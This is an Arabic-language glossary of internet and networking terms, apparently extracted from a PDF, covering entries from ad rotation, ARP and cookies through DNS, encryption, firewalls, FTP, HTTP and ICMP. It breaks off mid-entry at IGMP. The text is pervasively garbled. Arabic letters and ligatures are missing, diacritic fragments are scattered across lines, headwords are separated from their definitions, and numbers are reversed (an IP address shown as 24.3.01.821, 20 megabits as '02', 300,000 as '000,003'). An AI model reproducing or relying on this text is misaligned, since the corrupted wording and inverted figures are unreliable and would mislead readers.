‫تستخدم المساحات العلنیة على صفحات‪ ‬‬ ‫‪)Ad. Rotation‬تدوير العلنات)‬ ‫ويب‪ ،‬لعرض مجموعة إعلنات‪ ،‬بالتناوب‪ ،‬كل‪ ‬‬ ‫فترة محددة‪ .‬وتتوافر برمجیات خاصة‪ ،‬تعمل‪ ‬‬ ‫على مز ّد ويب‪ ،‬لدارة العلنات وعرضھا‪ .‬‬ ‫و‪ ‬‬ ‫ويستخدم مز ّد‪ ، DITnet‬مث ً‪ ،‬البرنامج‪ ‬‬ ‫و‪ ‬‬ ‫ل‬ ‫‪AdGeni‬لداء ھذه المھمة‪ .‬‬ ‫‪ Ad.‬‬ ‫يكون العلن في صفحات ويب على شكل‬ ‫مساحة مستطیلة الشكل‪ ،‬ذات عدد محدد‪ ‬‬ ‫منالبیكسلت‪ ،‬أو صورة‪ ،‬محدودة الحجم‪ .‬‬ ‫ا‪ ‬‬ ‫ب ما يكون متحر ً‬ ‫ك‪ ‬‬ ‫وغال ً‬ ‫ا‪ ‬‬ ‫( ‪( Address Resolution Protocol‬ھو‪ ‬‬ ‫‪)ARP‬بروتوكول حل العناوين)‬ ‫البروتوكول الذي يترجم عناوين إنترنت‪ ‬‬ ‫( ‪ ،Internet Protocol ( IP‬مثل العنوان (‪ ‬‬ ‫‪ ،) 24.3.01.821‬إلى عناوين فیزيائیة في‪ ‬‬ ‫الشبكة‪ .‬ويعد ‪ ARP‬أحد أفراد طاقم‪ ‬‬ ‫ا‪ ‬‬ ‫البروتوكولت الشھیرة‪ ، TCP/IP‬وھو يلعب دوًر‪ ‬‬ ‫ی في تلمس حزم البیانات‪ ،‬المرتحلة ا‪ ‬‬ ‫أساس ً‬ ‫ا‪ ‬‬ ‫ق‪ ‬‬ ‫عبر إنترنت‪ ،‬طريقھا باتجاه أھدافھا‪ ،‬طب ً‬ ‫ض ‪ DNS‬و ‪ PARP‬‬ ‫للعنوان الذي تحمله ‪.‬انظر أي ً‬ ‫ا‪ ‬‬ ‫‪ .TCP/IP‬‬ ‫‪)Auto­Negotiation‬الفاوض التلقائي)‪ ‬السم الرسمي له ‪ National‬‬ ‫‪ ،Semiconductor`s N­Way‬وھي تقنیة‪ ‬‬ ‫تسمح بتحديد سرعة الوصلة‪ ،‬واتجاه الرسال‪ ‬‬ ‫ا‪ ‬‬ ‫أحادي أم ثنائي‪ ،‬بین أجھزة إثرنت‪ ،‬اعتماًد‪ ‬‬ ‫على إمكانیاتھا‪ .‬‬ ‫‪ 835‬‬ ‫‪ )(B‬‬ ‫يقصد بالعمود الفقري ‪ Backbone‬في سیاق‪ ‬‬ ‫‪)Backbone‬العمود الفقري للشبكة)‬ ‫الحديث عن إنترنت‪ ،‬مجموعة الوصلت السريعة‪ ‬‬ ‫التي تصل بین الكمبیوترات المضیفة حول العالم‪ ‬‬ ‫في إطار شبكة إنترنت‪ .‬وتكون الصلة بإنترنت‪ ‬‬ ‫أفضل‪ ،‬من الناحیة النظرية‪ ،‬كلما كانت الصلة بین‬ ‫كمبیوترك والعمود الفقري لنترنت أكثر مباشرة (‬ ‫عبر عدد أقل من الوصلت )‪ ،‬وكذلك عندما تكون‪ ‬‬ ‫ھذه الوصلت سريعة‪ .‬‬ ‫مقدار حركة مرور البیانات الذي يمكن أن‪ ‬‬ ‫‪)Band Width‬عرض الحزمة)‬ ‫تستوعبه في لحظة واحدة‪ ،‬ويقاس بواحدة "بث‪ ‬‬ ‫في الثانیة‪ ‬‬ ‫‪ 935‬‬ ‫©‪ ‬‬ ‫ھیئة معتمدة‪ ،‬يتم الرجوع إلیھا للتحقق من ھوية‪ ‬‬ ‫‪) CA‬سلطة التصديق)‬ ‫أفراد أو شركات معینة ناشطة على إنترنت‪ ،‬أو‪ ‬‬


‫ھوية ومصدر عناصر‪ ،‬مثل‪ ، ActiveX‬والحصول على‬ ‫شھ ادات رقمیة تثبت أن الفرد أو الشركة أو العنصر‬ ‫معروف من قبل ھذه السلطة‪ ،‬ول ضیر في التعامل‬ ‫اللكتروني معھا‪ .‬وقد نشأت سلطات التصديق‪ ‬‬ ‫لتلبیة متطلبات التجارة اللكترونیة في ضمان‪ ‬‬ ‫حقوق المتعاملین بھا عبر إنترنت‪ ،‬بشكل رئیسي‪.‬‬ ‫يمكن أن تكون سلطة التصديق شركة مستقلة‪ ،‬‬ ‫م‪ ،‬أو تكون‪ ‬‬ ‫مثل ‪ ، VeriSign‬وعندھا تعتبر مرجعً عا ً‬ ‫ا ا‪ ‬‬ ‫ی في شركة‪ ،‬مثل قسم الكمبیوتر‪ ،‬‬ ‫قس ً‬ ‫م داخل ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫فتكون شھاداتھ ا معتمدة ضمن الشركة ذاتھا‪ ،‬أو‪ ‬‬ ‫مع بعض الشركات التي تتعامل معھا‪ ‬‬ ‫( ‪( Common Gateway Interface‬طريقة لنقل‪ ‬‬ ‫‪) CGI‬الواحه العمومیة للمعبر)‬ ‫المعلومات التي يدخلھا المستخدم في النماذج‪ ‬‬ ‫‪forms‬التي توجد في صفحات ويب‪ ،‬إلى البرامج‪ ‬‬ ‫التي تعالجھا في جھة مزود ويب‪ ،‬وبالعكس‪ .‬‬ ‫وتستخدم ‪ CGI‬في عملیات استعلم قواعد‪ ‬‬ ‫البیانات بھیئة ‪ HTML‬بصورة فورية‪ .‬ومن أكثر لغات‪ ‬‬ ‫البرمجة المستخدمة في برامج ‪ CGI‬شعبیة‪ ،‬لغة‪ ‬‬ ‫‪ .Perl‬‬ ‫تیار النقرات( ‪ (Click Straem‬‬ ‫ھو المسار الذي يسلكه المستخدم خلل تصفحه‬ ‫موقع ويب‪ .‬تساعد معلومات تیار النقرات مدير‪ ‬‬ ‫الموقع على معرفة كیفیة استخدام الزوار للموقع‪ ،‬‬ ‫وأي الصفحات تنال الھتمام الكبر‪ .‬وتساعد‪ ‬‬ ‫ض‪ ،‬على تحديد موقع الصفحات‪ ‬‬ ‫المعلن‪ ،‬أي ً‬ ‫ا‪ ‬‬ ‫المناسبة‪ ،‬لوضع إعلناته ضمنھا‪ ‬‬ ‫‪) Click Through‬نقرات العبور)‪ ‬‬ ‫يستخدم ھذا المصطلح بالتبادل مع "نقرة"‪ ،‬للدللة‬ ‫على عدد المرات التي عبر منھا الزائر إلى موقع‪ ‬‬ ‫المعلن‪ ،‬بالنقر على إعلن معین في صفحة ويب‪ ،‬‬ ‫ا‪ ‬‬ ‫ن‪ ‬‬ ‫للشركة المضیفة‪ .‬ويفضل المعلنون أن يدفعوا ثم ً‬ ‫لنقرات العبور‪ ،‬بد ً من عروض العلن‪ ،‬لن الزائر‪ ‬‬ ‫ل‪ ‬‬ ‫قد يرى العلن‪ ،‬لكن بدون أن ينقر فوقه للذھاب‪ ‬‬ ‫إلى موقع المعلن‪ ..‬‬ ‫‪) Click‬نقرة)‪ ‬‬ ‫عندما ينقر المستخدم فوق إعلن موجود على‪ ‬‬ ‫صفحة ويب‪ ،‬وينتقل من خلل الوصلة التشعبیة‪ ‬‬ ‫‪ 045‬‬ ‫إلى موقع الشركة صاحبة العلن‪ ،‬تحتسب له‪ ‬‬ ‫نقرة (‪ (click‬واحدة ‪ .‬‬ ‫‪) Collisiion‬التصادم)‪ ‬‬ ‫يحدث التصادم عندما يكتشف أحد أجھزة شبكة‪ ‬‬ ‫م‪ .‬وعلى‪ ‬‬ ‫إثرنت‪ ،‬أثناء إرساله للبیانات‪ ،‬إطاًر قاد ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫الجھاز المرسل‪ ،‬في ھذه الحالة‪ ،‬أن يتوقف عن‪ ‬‬


‫الرسال مباشرة‪ ،‬لفترة زمنیة عشوائیة‪ ،‬قبل أن‪ ‬‬ ‫يحاول بث الطار مرة أخرى‪ .‬يمكن محاكاة التصادم‬ ‫بواسطة جھاز قادر على التحكم بتدفق البیانات‪ ،‬‬ ‫يطلب من المحطة المرسلة إعادة إرسال الطار‪ ،‬‬ ‫في تاريخ آخر‪ ،‬لتجنب ضیاعه‪ .‬‬ ‫‪) Cookie‬كوكي)‪ ‬‬ ‫تشیر العبارة إلى ملف أو سجل بیانات‪ُ ،‬سجل‪ ‬‬ ‫ي‪ ‬‬ ‫على القرص الصلب لكمبیوترك بواسطة كمبیوترات‬ ‫أخرى خلل اتصالك بھ ا‪ .‬وتتیح البیانات المدونة في‬ ‫الملف‪ ، cookies‬للمزود ‪ server‬الذي تتصل به‪ ،‬‬ ‫معرفة المواقع التي زرتھ ا في الونة الخیرة‪ ،‬‬ ‫ومعلومات أخرى عنك ‪.‬وحیث أن القلیل من‪ ‬‬ ‫المزودات في إنترنت‪ ،‬تخبرك أنھا ستسجل ( أو‪ ‬‬ ‫ستقرأ ) معلومات تخصك في الملف‪ ، cookies‬فإن‬ ‫الكثیرين يعتبرونھا انتھا ً‬ ‫ك لحرمة خصوصیاتھم‪ .‬‬ ‫ا‪ ‬‬ ‫وظھرت العديد من البرمجیات المضادة للكوكي‪ ‬‬ ‫‪ ،anti­cookie‬التي تبادر إلى محو أية بیانات‪ ‬‬ ‫تسجل في الملف ‪ cookies‬فورا‪ .‬‬ ‫‪) CPM‬تكلفة عرض الصفحات)‪ ‬‬ ‫‪ ،cost of page views per thousand‬التكلفة التي‬ ‫يحددھا موقع ويب لنشر العلن‪ ،‬تبعً لعدد عروض‬ ‫ا‪ ‬‬ ‫الصفحات‪ ،‬مقدرة باللف‪ ،‬ويرمز الحرف ‪ M‬في‪ ‬‬ ‫‪ ،CPM‬إلى "اللف" باللغة الرومانیة القديمة‪ ،‬ولیس‬ ‫إلى ملیون أو میجا‪ .‬ويستخدم مندوبو المبیعات‪ ،‬‬ ‫ا‪ ‬‬ ‫ن‪ ،‬مصطلح ‪ CPM‬للدللة على تكلفة عروض‬ ‫أحیا ً‬ ‫العلنات‪ ،‬لنه من الصعب ضمان أن يؤدي عرض‪ ‬‬ ‫م‪ ،‬إلى عرض العلن‪ ،‬فقد يزلق الزائر‪ ‬‬ ‫الصفحة دو ً‬ ‫ا‪ ‬‬ ‫الصفحة‪ ،‬بحیث يختفي العلن من أمامه!‪ ‬‬ ‫‪) CyberCash‬سايبر كاش)‪ ‬‬ ‫نظام لدفع النقود‪ ،‬بواسطة الشیكات اللكترونیة أو‬ ‫بطاقات الئتمان‪ ،‬طورته شركة‪ ، CyberCash Inc.‬‬ ‫وتستخدمه مز ّدات التجارة اللكترونیة لتدقیق‪ ‬‬ ‫و‪ ‬‬ ‫معلومات بطاقات الئتمان‪ ،‬ومعالجة المدفوعات‪ ،‬‬ ‫لقاء رسوم بسیطة تدفعھا للشركة‪ .‬ويلجأ الفراد‪ ‬‬ ‫إلى نظام ‪ CyberCash‬للحصول على شیكات‪ ‬‬ ‫إلكترونیة‪ ،‬لستخدامھا في عملیات الشراء عبر‪ ‬‬ ‫ض ‪ .‬‬ ‫إنترنت‪ ،‬لقاء بعض الرسوم‪ ،‬أي ً‬ ‫ا‪ ‬‬ ‫‪ 145‬‬ ‫‪ )(D‬‬ ‫‪)Digital Signature‬توقیع رقمي) بیانات تضاف على الرسائل اللكترونیة‪ ،‬لثبات‪ ‬‬ ‫ھوية مرسلھا‪ ،‬وسلمة محتوياتھا خلل التبادل‪ .‬‬ ‫يستخدم المرسل دالة خاصة ( ‪ ( hash function‬‬ ‫لتولید رقم معین‪ ،‬يسمى التوقیع‪ ،‬بالعتماد على‪ ‬‬ ‫محتويات الرسالة‪ ،‬ثم يش ّر التوقیع الناتج ويضیفه‪ ‬‬


‫ف‪ ‬‬ ‫إلى الرسالة‪ ،‬باستخدام مفتاح تشفیر خصوصي‪ .‬‬ ‫وعلى الطرف الخر‪ ،‬يعید المتلقي حساب الرقم‪ ‬‬ ‫الناتج عن تطبیق الدالة ذاتھا على نص الرسالة (‪ ‬‬ ‫بدون الرقم المش ّر) ‪ ،‬ويفك تشفیر التوقیع‪ ‬‬ ‫ف‪ ‬‬ ‫باستخدام مفتاح التشفیر العمومي الخاص‪ ‬‬ ‫بالمرسل ( والذي يعرفه المتلقي مسبقً )‪ ،‬ويقارن‬ ‫ا‪ ‬‬ ‫بین الرقمین‪ .‬ويدل تطابق الرقمین أن محتويات‪ ‬‬ ‫الرسالة وصلت سلیمة بدون أي تشويه‪ ،‬وتحمل‪ ‬‬ ‫توقیع المرسل الصحیح‪ ،‬ول خوف من كون الرسالة‬ ‫مزورة ( أي مرسلة من قبل شخص آخر)‪ .‬‬ ‫( ‪( Domain Name Service‬قاعدة بیانات فورية‪ ‬‬ ‫‪)DNS‬خدمات أسماء النطاقات)‬ ‫تستخدم في المطابقة بین العناوين الرقمیة‪ ‬‬ ‫لبروتوكول إنترنت ‪ IP‬مثل‪ ،) 24.3.01.821(:‬‬ ‫والسماء الحرفیة للنطاقات التي يسھل على‪ ‬‬ ‫الناس قراءتھا وتذكرھا مثل‪ : pcmag-‬‬ ‫‪mideast.com.‬ول تجتمع بیانات ‪ DNS‬في كمبیوتر‬ ‫واحد معین‪ ،‬بل ھ ي موزعة بین آلف مزودات ‪DNS‬‬ ‫المنتشرة عبر إنترنت‪ .‬‬ ‫اسم يشیر إلى الحیز الذي تملكه مؤسسة معینة‬ ‫‪)Domain Name‬اسم النطاقات)‬ ‫من فضاء إنترنت‪ ،‬ويمكن ترجمته إلى عنوان معین‪ ‬‬ ‫في الشبكة‪ ،‬مثل ‪: orgnization.com .‬تتألف‪ ‬‬ ‫أسماء النطاقات من مقطعین أو أكثر تفصل فیما‪ ‬‬ ‫بینھا علمة النقطة "‪ ،".‬وتتدرج في شمولیتھا من‪ ‬‬ ‫الدائرة الوسع في أقصى الیمین إلى الدائرة‪ ‬‬ ‫الضیق في أقصى الیسار‪ .‬وتبدأ أسماء المواقع‪ ‬‬ ‫غیر المريكیة ( من أقصى الیمین )‪ ،‬بحرفین يدلن‬ ‫على اسم البلد‪ .‬ويدل المقطع التالي على تصنیف‬ ‫المؤسسة؛ فالحروف ‪ com‬تشیر إلى مؤسسة‪ ‬‬ ‫تجارية‪ ، commercial‬والحروف ‪ gov‬تشیر إلى‪ ‬‬ ‫مؤسسة حكومیة‪ ، government‬و ‪edu‬على‪ ‬‬ ‫مؤسسة تعلیمیة‪ ..‬وھكذا ‪.‬وتخلو أسماء النطاقات‪ ‬‬ ‫المريكیة من المقطع الدال على الدولة التي‪ ‬‬ ‫ينتمي إلیھا النطاق‪ .‬ولتلفي تعارض أسماء‪ ‬‬ ‫النطاقات‪ ،‬كلفت مراكز ‪ Information Network‬‬ ‫‪ ،Centers NICs‬بتسجیل أسماء النطاقات‪ .‬ويمكن‪ ‬‬ ‫‪ 245‬‬ ‫تسجیل أسماء النطاقات غیر العسكرية لدى‪ ‬‬ ‫مؤسسة ‪ InterNIC‬المريكیة‪ .‬ويتطلب تسجیل‪ ‬‬ ‫ی‪ ،‬دفع رسوم استخدامه‬ ‫اسم النطاق للموقع‪ ،‬حال ً‬ ‫ا‪ ‬‬ ‫ض‪ ،‬خدمة‪ ‬‬ ‫أي‬ ‫الرسوم‬ ‫لمدة سنتین‪ ،‬وتغطي ھذه‬ ‫ً‬ ‫ا‪ ‬‬ ‫السم من قبل كمبیوترين ‪ DNS‬أو أكثر في شبكة‬ ‫إنترنت‪ ،‬يقع على عاتقھما ترجمة ھذا السم إلى‬ ‫عنوان رقمي في الشبكة‪ .‬‬ ‫‪ 345‬‬ ‫‪ ) (E‬‬


‫ھي عملیة تحويل البیانات التي على شكل‪ ‬‬ ‫‪)Encryption‬التشفیر)‬ ‫نصوص بسیطة‪ ، plaintext‬إلى ھ یئة ل يمكن لحد‬ ‫قراءتھا وفھمھ ا بدون عملیة معاكسة تسمى إزالة‪ ‬‬ ‫التشفیر‪ ، decryption‬تعیدھا إلى ھیئتھا الصلیة‪ .‬‬ ‫وفیما ل توجد طريقة في التشفیر من شأنھا توفیر‬ ‫الحماية المطلقة للبیانات على المدى البعید‪ ،‬فإن‪ ‬‬ ‫البحاث الحديثة توصلت إلى أسالیب في‪ ‬‬ ‫التشفیر‪ ،‬تجعل من المستحیل إعادة النصوص‪ ‬‬ ‫المشفرة إلى ھیئتھ ا الصلیة ‪/‬بدون امتلك "مفتاح‬ ‫التشفیر ‪" encryption key:‬ويتفق خبراء إنترنت‪ ‬‬ ‫على أھمیة تحقیق تشفیر محكم للمعلومات‪ ‬‬ ‫الخاصة ببطاقات الئتمان التي ترسل عبر الشبكة‪ ‬‬ ‫في سیاق عملیات التجارة اللكترونیة‪ ،‬كشرط‪ ‬‬ ‫لتشجیع الناس على القبال على التعامل مع ھذا‬ ‫النوع من التجارة‪ .‬‬ ‫ھي امتداد لشبكة إنترانت الخاصة بمؤسسة‪ ‬‬ ‫‪)Extranet‬إكسترا نت)‬ ‫معینة‪ ،‬على إنترنت‪ ،‬بحیث يستطیع الشخاص‪ ‬‬ ‫المخولون‪ ،‬مثل موظفي المؤسسة المتنقلین‪ ،‬‬ ‫وبعض الزبائن والموردين‪ ،‬الوصول إلى البیانات‪ ‬‬ ‫والتطبیقات الموجودة على إنترانت‪ ،‬عبر شبكة‪ ‬‬ ‫ويب ‪.‬وتحتاج شبكات إكسترانت إلى تخطیط‪ ‬‬ ‫وتنفیذ دقیقین‪ ،‬لن ترك أي ثغرة أمنیة قد يؤدي‪ ‬‬ ‫إلى دخول القراصنة إلى الشبكة والعبث بالبیانات‪.‬‬ ‫ويتم تنظیم عملیات وصلحیات استخدام‪ ‬‬ ‫إكسترانت بواسطة الحواجز النارية( ‪ .( firewalls‬‬ ‫‪ 445‬‬ ‫‪ )(F‬‬ ‫( ‪( Frequently Asked Questions‬وثیقة تتضمن‪ ‬‬ ‫‪)FAQ‬أسئلة يتكرر طرحھا)‬ ‫إجابات على أسئلة في مجال معین‪ ،‬يتكرر‪ ‬‬ ‫طرحھ ا عبر شبكة ويب‪ .‬تتوفر وثائق ‪ FAQ‬في‪ ‬‬ ‫ا‪ ‬‬ ‫ق‪ ‬‬ ‫مواقع كثیرة عبر إنترنت‪ ،‬وھي تغطي نطا ً‬ ‫واسعً ومتنوع ً من المعلومات‪ ،‬من فن الطبخ‪ ‬‬ ‫ا‪ ‬‬ ‫ا‬ ‫وحتى آلیات عمل بروتوكولت‪ TCP/IP.‬‬ ‫نظام أمني لتنظیم حركة المرور عند نقاط‪ ‬‬ ‫‪)Firewall‬حاجز ناري)‬ ‫التصال بین إنترنت وإنترانت ( أو بین أي شبكتین‬ ‫في الحالة العامة )‪ ،‬يسمح لحزم البیانات بالعبور‬ ‫بین الشبكتین‪ ،‬أو يمنعھا‪ ،‬اعتماد ً على مجموعة‬ ‫ا‪ ‬‬ ‫من القواعد يحددھ ا مدير شبكة إنترانت ) مثل‪ ‬‬ ‫اسم المستخدم وكلمة السر‪ ،‬أو عنوان‪ ، IP‬أو‪ ‬‬ ‫رقم ھاتف المتصل في حالة السماح بالدخول‪ ‬‬ ‫عبر اتصالت ‪ dial­in ... (.‬ويوجد العديد من حلول‬ ‫الحواجز النارية‪ ،‬فبعضھا عبارة عن برمجیات فقط‪ ‬‬ ‫تعمل على أي مز ّد‪ ،‬والبعض الخر حلول‪ ‬‬ ‫و‪ ‬‬ ‫متكاملة‪ ،‬تتألف من برمجیات تعمل على أجھزة‪ ‬‬ ‫مخصصة‪ ،‬ومزودة بمودمات وبطاقات شبكة‪ .‬كانت‬ ‫الحواجز النارية تعمل‪ ،‬في السابق‪ ،‬في ظل‪ ‬‬


‫يونیكس فقط‪ ،‬أما الن فھناك العديد من الحواجز‪ ‬‬ ‫الفعالة التي تعمل في ظل ويندوز إن‪.‬تي‪ .‬‬ ‫حرب كلمات تنشأ بین مشاركین في إحدى‪ ‬‬ ‫مجموعات النقاش أو القوائم البريدية‪ ،‬بسبب‪ ‬‬ ‫‪)Flame‬حرب الكلمات)‬ ‫طرح تعلیق شخصي غیر مناسب‪ ،‬أو محاولة بث‬ ‫رسائل ترويج تجارية لمنتج ما‪ ،‬أو غیرھا من‪ ‬‬ ‫التصرفات غیر اللئقة‪ .‬ويعاقب الشخص‪ ‬‬ ‫المسيء‪ ،‬عادة‪ ،‬بأن يرسل له أعضاء المجموعة‪ ‬‬ ‫أو القائمة البريدية‪ ،‬مجموعة كبیرة من الرسائل‪ ‬‬ ‫اللكترونیة‪ ،‬مرفقً بھا ملفات ضخمة الحجم‪ ،‬‬ ‫ا‪ ‬‬ ‫لتبديد وقته أثناء تفحصه لصندوق بريده‪ ‬‬ ‫اللكتروني‪ ،‬ولغمر قرصه الصلب بملفات ضخمة‪ ‬‬ ‫ل فائدة منھا‪ .‬‬ ‫المعدل القصى الذي تستطیع فیه البدالة أن‪ ‬‬ ‫‪)Forwarding Rate‬معدل التمرير)‬ ‫تمرر الطارات‪ ،‬بدون أن تسقطھا‪ .‬‬ ‫تقنیة سريعة لتراسل حزم البیانات‪ ،‬تستخدم‪ ‬‬ ‫‪)Frame Relay‬تحويل الطارات)‬ ‫ن في التصالت عبر العمود الفقري‪ ‬‬ ‫أحیا ً‬ ‫ا‪ ‬‬ ‫‪backbone.‬وتلقي تقنیة تحويل الطارات بأعباء‪ ‬‬ ‫التحري عن أخطاء الرسال‪ ،‬ومعالجتھا على‪ ‬‬ ‫الكمبیوترين اللذان يقومان بالتراسل‪ ،‬وھي‪ ،‬‬ ‫لذلك‪ ،‬طريقة سريعة وغیر مكلفة في نقل‪ ‬‬ ‫البیانات‪ .‬‬ ‫‪ 545‬‬ ‫( ‪( File Transfer Protocol‬أحد أكثر بروتوكولت‪ ‬‬ ‫‪)FTP‬بروتوكول نقل الملفات)‬ ‫ع‪ ،‬يستخدم لنقل الملفات من كمبیوتر إلى ا‬ ‫شیو ً‬ ‫آخر عبر إنترنت‪ .‬ويمكن لمستخدمي إنترنت‪ ‬‬ ‫الولوج إلى مزودات ‪ FTP‬لستجلب الملفات‪ ‬‬ ‫بمختلف أنواعھا وھیئاتھا‪ .‬ويمكن حماية الملفات‪ ‬‬ ‫الموجودة في مزودات ‪ FTP‬من وصول أشخاص‪ ‬‬ ‫غیر مصرح لھم باستجلبھا‪ ،‬بواسطة كلمة‪ ‬‬ ‫السر‪ ،‬أو تركھا متاحة لي كان‪ ،‬بدون السؤال عن‬ ‫ض‪ TFTP.‬‬ ‫شخصه‪ .‬انطر أي ً‬ ‫ا‪ ‬‬ ‫بث للبیانات باتجاھ ین في آن واحد‪ ،‬بدون تصادم‪،‬‬ ‫‪)Full Duplex‬الرسال ثنائي التجاه)‬ ‫عبر أزواج السلك المفتولة أو عبر الكوابل‪ ‬‬ ‫الضوئیة‪ .‬يعتبر التحويل ثنائي التجاه طريقة‪ ‬‬ ‫د‪ ،‬لتحسین أداء المزود‪ ،‬لعدة أسباب‪ :‬‬ ‫سھ لة ج ً‬ ‫ا‪ ‬‬ ‫أن الرسال ثنائي التجاه يخفض تأخیر البیانات‪ ‬‬ ‫لدى التحويل‪ ،‬فإذا وصلت الرزمة من بوابة وحیدة‪ ‬‬ ‫التجاه أن تبدأ الرسال‪ ،‬فور التأكد من أن الرزمة‪ ‬‬ ‫القادمة لیست مشوھة‪ ،‬ولیس ضروريً النتظار‪ ‬‬ ‫ا‪ ‬‬ ‫حتى تصبح واسطة النقل متاحة للستخدام‪ .‬‬ ‫يضاف إلى ذلك أنه يمكن تمرير الرزم التي تصل‪ ‬‬ ‫من بوابة ثنائیة التجاه‪ ،‬حالما يحدد ھدفھا‪ ،‬إذ ل‪ ‬‬ ‫يوجد في ھذه الحالة تصادم‪ ،‬ول رزم مشوھة ‪ .‬‬ ‫السبت الثاني‪ ،‬أن عرض الحزمة باتجاه المزود‪ ‬‬


‫يتحسن‪ ،‬لن الرسال والستقبال يحدثان في‪ ‬‬ ‫وقت واحد‪ .‬فإذا كان معدل الرسال والستقبال‪ ‬‬ ‫متماثلین‪ ،‬فیمن الوصول إلى عرض حزمة يبلغ‪ ‬‬ ‫‪ 02‬میجابت في الثانیة‪ .‬يكون تحسن عرض‪ ‬‬ ‫الحزمة‪ ،‬أكثر تواضعً من الناحیة العلمیة‪ ،‬ويمكن‪ ‬‬ ‫ا‪ ‬‬ ‫الشعور بتأثیر تأخیر البیانات‪ 001Base­TX .‬‬ ‫‪ 645‬‬ ‫‪ )(G‬‬ ‫يطلق ھذا السم بشكل عام على أي عتاد أو‪ ‬‬ ‫‪)Gateway‬منفذ)‬ ‫برنامج يتولى مھ مة ترجمة البیانات بین بروتوكولت‪ ‬‬ ‫مختلفة‪ .‬فمث ً‪ ،‬تستخدم شبكة المعلومات المريكیة‪ ‬‬ ‫ل‪ ‬‬ ‫ص لترجمة البريد اللكتروني بین‪ ‬‬ ‫‪ ،Prodigy‬منفذ ً خا ً‬ ‫ا ا‪ ‬‬ ‫الھ یئة الداخلیة الخاصة التي تستخدمھا‪ ،‬والھیئة‪ ‬‬ ‫القیاسیة المستخدمة في البريد اللكتروني لنترنت‪.‬‬ ‫ض‪ ،‬للشارة‪ ‬‬ ‫ويستخدم المصطلح "منفذ ‪" gateway‬أي ً‬ ‫ا‪ ‬‬ ‫إلى أية آلیة تربط بین نظامین‪ .‬تستخدم شبكة‪ ‬‬ ‫المعلومات المريكیة ‪ AOL‬منفذا لتأمین وصول زبائنھا‪ ‬‬ ‫إلى إنترنت من خللھا‪ .‬‬ ‫‪ 745‬‬ ‫‪ ) (H‬‬ ‫ر ھ ذا المصطلح في سیاق الحديث عن شبكة ويب‪ ،‬‬ ‫‪)Hit‬ضربة)‬ ‫إلى كل طلب يصدر عن المتصفح إلى مزود ويب ‪ web‬‬ ‫‪ ،server‬للحصول منه على عنصر معلوماتي واحد‪ .‬‬ ‫مث ً‪ ،‬يحتاج الحصول على صفحة تحتوي على ‪ 3‬صور‪ ،‬ل‪ ‬‬ ‫إلى ‪ 4‬ضربات في المزود؛ واحدة لصفحة ‪ ، HTML‬‬ ‫ووحدة لكل من الصور الثلث‪ .‬يستخدم عدد الضربات‪ ‬‬ ‫كمؤشر فضفاض على مقدار الضغط الواقع على‪ ‬‬ ‫المزود‪ ،‬فیقول أحدھم‪ :‬إن مزودنا يتلقى ‪ 000,003‬‬ ‫ا‪ ‬‬ ‫ب‪ ‬‬ ‫ضربة في الشھ ر‪ .‬ولن الضربة يمكن أن تعني طل ً‬ ‫لي شيء‪ ،‬سواء كان وثیقة صغیرة ( أو حتى وثیقة‪ ‬‬ ‫ب يستدعي عملیات معالجة‪ ‬‬ ‫غیر موجودة )‪ ،‬أو طل ً‬ ‫ا‪ ‬‬ ‫معقدة ( كالبحث عن معلومة معینة مث ً( ‪ ،‬فإنه من‪ ‬‬ ‫ل‪ ‬‬ ‫الصعب تحديد مقدار الحمولة الناجمة عن "الضربة"‪ ‬‬ ‫على المزود‪ .‬‬ ‫‪)HTML‬لغة الترمیز التشعبي)‪ ‬‬ ‫( ‪( Hypertext Markup Language‬لغة برمجة‪ ‬‬ ‫تستخدم في وصف ھیئات النصوص التشعبیة‪ ‬‬ ‫‪ ،hypertext‬ويمكن تطبیقھا باستخدام برامج شبیھة‪ ‬‬ ‫بمعالجات النصوص العادية‪ .‬تستخدم لغة ‪ HTML‬في‪ ‬‬ ‫ض ‪ HTTP‬و‪ VRML.‬‬ ‫إعداد صفحات ويب‪ .‬انطر أي ً‬ ‫ا‪ ‬‬ ‫‪)HTTP‬بروتوكول نقل النص المتشعب)‪ ‬‬ ‫( ‪( Hypertext Transfer Protocol‬ھو البروتوكول‪ ‬‬


‫المعتمد لنقل النصوص بھیئة ‪ HTML‬في شبكة ويب‪ .‬‬ ‫يحتوي بروتوكول ‪ HTTP‬على أوامر عالیة المستوى‪ ،‬‬ ‫مثل ‪ Get‬و‪ ، Put‬تستخدمھا المتصفات ‪ browsers‬في‪ ‬‬ ‫التواصل مع مزودات ويب‪ .‬ويستخدم المر ‪ Get‬لطلب‪ ‬‬ ‫صفحة ذات ھیئة ‪ ، HTML‬أو صورة بھیئة‪ ، .GIF‬أو أية‪ ‬‬ ‫بیانات أخرى من مزود ويب‪ ،‬لعرضھا على الشاشة‪ .‬‬ ‫ض‪ . HTML‬‬ ‫انظر أي ً‬ ‫ا‪ ‬‬ ‫ن المكرر‪ ،‬يوسع المفرع الشبكة المشتركة‪،‬‬ ‫يدعى أحیا ً‬ ‫ا‪ ‬‬ ‫‪)HUB‬المفرع)‪ ‬‬ ‫ويسمح بإضافة مفرعات ومحطات أخرى إلیھا‪ .‬يتسلم‪ ‬‬ ‫المفرع كافة الطارات والتصادمات‪ ،‬والشارات‪ ،‬الخرى‪،‬‬ ‫ثم يعید إرسالھا ونشرھا ضمن الشبكة‪ .‬‬ ‫‪ 845‬‬ ‫‪ )(I‬‬ ‫( ‪( Internet Control Message Protocol‬ھو‪ ‬‬ ‫‪)ICMP‬بروتوكول رسائل التحكم لنترنت)‬ ‫البروتوكول المستخدم في نقل رسائل الخطأ‪ ‬‬ ‫ا‪ ‬‬ ‫ق‪ ‬‬ ‫وف‬ ‫البیانات‪،‬‬ ‫والتحكم‪ ،‬المتعلقة بنقل حزم‬ ‫ً‬ ‫للبروتوكول ‪ IP.‬فعندما يتعذر توصیل حزمة ‪ IP‬إلى‪ ‬‬ ‫العنوان الذي تحمله‪ ،‬بسبب انشغال أو عطل طارئ‪ ‬‬ ‫في المزود الھ دف‪ ،‬أو بسبب اختناقات مرورية في‪ ‬‬ ‫توصیلت الشبكة‪ ،‬يصدر أحد الموجھات ‪ routers‬في‬ ‫الشبكة‪ ،‬رسالة ‪ ICMP‬لخطار المرسل بعدم وصول‪ ‬‬ ‫ض‪ IP.‬‬ ‫الحزمة لیعید إرسالھا‪ .‬انظر أي ً‬ ‫ا‪ ‬‬ ‫‪)IGMP‬برتوكول لدارة المجموعات)‪ ( Internet Group Management Protocol ‬‬ ‫(بروتوكول من مجموعة‪ 